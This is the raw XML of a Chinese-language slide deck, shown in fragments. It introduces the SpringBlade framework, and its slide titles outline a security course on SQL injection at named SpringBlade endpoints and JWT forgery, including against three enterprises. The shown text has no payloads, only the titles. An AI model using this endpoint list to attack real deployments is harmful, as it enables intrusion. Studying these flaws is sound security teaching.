            <a:ext cx="4974590" cy="4939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02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr spc="300">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目搭建</a:t>
            </a:r>
            <a:endParaRPr spc="300">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>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框架介绍</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2308860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>SpringBlade 是一个由商业级项目升级优化而来的SpringCloud分布式微服务架构、SpringBoot单体式微服务架构并存的综合型项目，采用Java17 API重构了业务代码，完全遵循阿里巴巴编码规范。采用Spring Boot 3.2 、Spring Cloud 2023 、Mybatis 等核心技术，同时提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>官网：bladex.cn</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://github.com/chillzhuang/SpringBlade</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="209550" y="3632200"/>
            <a:ext cx="5270500" cy="3090545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283325" y="2555240"/>
            <a:ext cx="4932045" cy="3816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微服务版架构图</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5" name="图片 4" descr="blade架构图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17145" y="1082040"/>
            <a:ext cx="11285220" cy="5776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1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1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="01"/>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1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1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2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UNIT_PRESET_TEXT" val="03"/>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3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3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2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UNIT_PRESET_TEXT" val="02"/>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2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_2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UNIT_PRESET_TEXT" val="03"/>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3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3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UNIT_PRESET_TEXT" val="03"/>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3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3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4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{4443227a-303e-40a9-b684-8f69fca24a34}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag35.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{81cc4d60-2578-4c06-8b1e-0769d2af46e9}"/>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commondata" val="eyJoZGlkIjoiMTllZmQwODg0Y2NiNzNlZTkyZjVlZTFkMjIzODQxM2QifQ=="/>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24441</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>1980</Paragraphs>
  <Slides>161</Slides>
  <Notes>4</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161</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="192" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>阿里巴巴普惠体</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>inpin heiti</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi M</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi B</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi R</vt:lpstr>
      <vt:lpstr>ShidianHackSafariFont</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi R</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>汉仪雅酷黑 85W</vt:lpstr>
      <vt:lpstr>汉仪正圆-55W</vt:lpstr>
      <vt:lpstr>仿宋_GB2312</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>MiSans Light</vt:lpstr>
      <vt:lpstr>汉仪细秀体简 L</vt:lpstr>
      <vt:lpstr>WPS</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>学习方法</vt:lpstr>
      <vt:lpstr>学习方法</vt:lpstr>
      <vt:lpstr>web流程</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PowerPoint 演示文稿</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Web前端技术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Web后端开发</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Web后端技术</vt:lpstr>
      <vt:lpstr>令牌</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-引言</vt:lpstr>
      <vt:lpstr>令牌-JWT</vt:lpstr>
      <vt:lpstr>令牌-JWT</vt:lpstr>
      <vt:lpstr>令牌-JWT</vt:lpstr>
      <vt:lpstr>令牌-JWT</vt:lpstr>
      <vt:lpstr>令牌-JWT</vt:lpstr>
      <vt:lpstr>令牌-JWT</vt:lpstr>
      <vt:lpstr>令牌-JWT</vt:lpstr>
      <vt:lpstr>学习方法</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>框架介绍 </vt:lpstr>
      <vt:lpstr>微服务版架构图</vt:lpstr>
      <vt:lpstr>搭建环境须知</vt:lpstr>
      <vt:lpstr>前端工程介绍</vt:lpstr>
      <vt:lpstr>后端工程介绍</vt:lpstr>
      <vt:lpstr>搭建过程</vt:lpstr>
      <vt:lpstr>搭建过程</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr> 漏洞的收集</vt:lpstr>
      <vt:lpstr> 漏洞分析</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/error/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/usual/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/usual/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/usual/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/dict/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/dict/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/dict/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/menu/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/menu/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/menu/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-user/export-user</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-user/export-user</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-user/export-user</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类-企业2</vt:lpstr>
      <vt:lpstr>伪造JWT类-企业1</vt:lpstr>
      <vt:lpstr>伪造JWT类-企业3</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-user/export-user</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-user/export-user</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-user/export-user</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-user/export-user</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-user/export-user</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/menu/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/menu/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/menu/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/menu/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/dict/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/dict/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-system/dict/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/usual/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/usual/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/usual/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/error/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/error/list</vt:lpstr>
      <vt:lpstr> SQL注入类-/blade-log/error/list</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>伪造JWT类</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>目的 </vt:lpstr>
      <vt:lpstr>工具一使用： </vt:lpstr>
      <vt:lpstr>工具一使用： </vt:lpstr>
      <vt:lpstr>工具二使用： </vt:lpstr>
      <vt:lpstr>工具二使用： </vt:lpstr>
      <vt:lpstr>结语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RafaelSun</cp:lastModifiedBy>
  <cp:revision>1333</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-25T02:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-05T14:44:45Z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E42767E41DD54175B7B64A6C1414626D_12</vt:lpwstr>
  </property>
</Properties>
</file>